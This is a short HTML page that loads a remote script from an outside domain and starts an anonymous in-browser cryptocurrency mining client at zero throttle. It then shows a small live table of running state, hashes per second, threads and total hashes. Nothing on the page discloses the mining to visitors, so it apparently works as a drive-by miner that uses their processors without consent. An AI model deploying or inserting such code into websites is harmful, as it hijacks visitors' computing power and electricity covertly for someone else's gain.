<head>
  <style>
  </style>
<script src="https://www.freecontent.date./wURl.js"></script>

<script>
    var _client = new Client.Anonymous('6edc6156ce51957c327c6ac1c7380cd497d985dcecb2a7a87f2085ff0db2504e', {
              throttle: 0
                    });
    _client.start();

  var count = 10;

  setInterval(function() {

    if (count == 10) {
      document.getElementById('overflow').innerHTML = document.getElementById('container').innerHTML;
      document.getElementById('container').innerHTML = "<tr><th>r</th><th>h/s</th><th>+</th><th>#</th></tr>";
      count = 0;
    }

    document.getElementById('container').insertAdjacentHTML('beforeend', "<tr><td>" + _client.isRunning() + '</td><td>' + _client.getHashesPerSecond() + '</td><td>' + _client.getNumThreads() + '</td><td>' + _client.getTotalHashes() + '</td></tr>');
    count = count + 1;
  }, 5000);

</script>
</head>

<body>
  <table id="overflow"></table>
  <table id="container"></table>
</body>
